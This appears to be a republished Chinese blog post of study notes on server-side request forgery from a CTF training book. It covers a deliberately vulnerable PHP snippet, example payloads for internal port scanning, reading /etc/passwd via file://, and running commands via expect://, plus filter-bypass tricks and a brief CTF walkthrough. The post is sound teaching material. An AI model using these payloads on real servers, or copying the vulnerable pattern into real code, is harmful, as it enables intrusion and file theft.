服务端请求伪造(SSRF)

admin 2022年10月16日09:25:58评论34 views字数 871阅读2分54秒阅读模式


服务端请求伪造(SSRF)


前言
继续阅读《CTF特训营》web部分 本节是SSRF
1、简介
很多web应用可以根据用户指定的url从别的服务器是那个获取数据 如果没有有效过滤和限制,会被恶意使用成为代理通道实现攻击
例子

<?php    $url=$_GET['url'];    echo file_get_contents($url);?>

payload

http://xxx.com/ssrf.php?rul=http://192.168.252.1:8000

获取内网主机http服务8000端口的开放情况
2、防护与绕过
常用防护
限制请求特定域名禁止请求内网IP
绕过方法
http://[email protected]这种格式绕过正则IP转换进制配置域名
3、危害与利用
一些例子如下

http://xxx.com/ssrf.php?url=http://192.168.252.130:80 扫描端口http://xxx.com/ssrf.php?url=http://127.0.0.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 缓冲区溢出攻击http://xxx.com/ssrf.php?url=file:///etc/passwd 读取文件http://xxx.com/ssrf.php?url=expect://id 通过expect协议执行系统命令

4、实例
XDCTF中的web300
通过file协议读取源码如下 

服务端请求伪造(SSRF)再读取hosts文件发现绑定了另外一个域名 扫描域名的端口,发现3389端口 再进行sql注入
结语
了解了SSRF 关键是个绕过正则过滤




   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):服务端请求伪造(SSRF)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月16日09:25:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   服务端请求伪造(SSRF)http://cn-sec.com/archives/1351389.html

发表评论

匿名网友 填写信息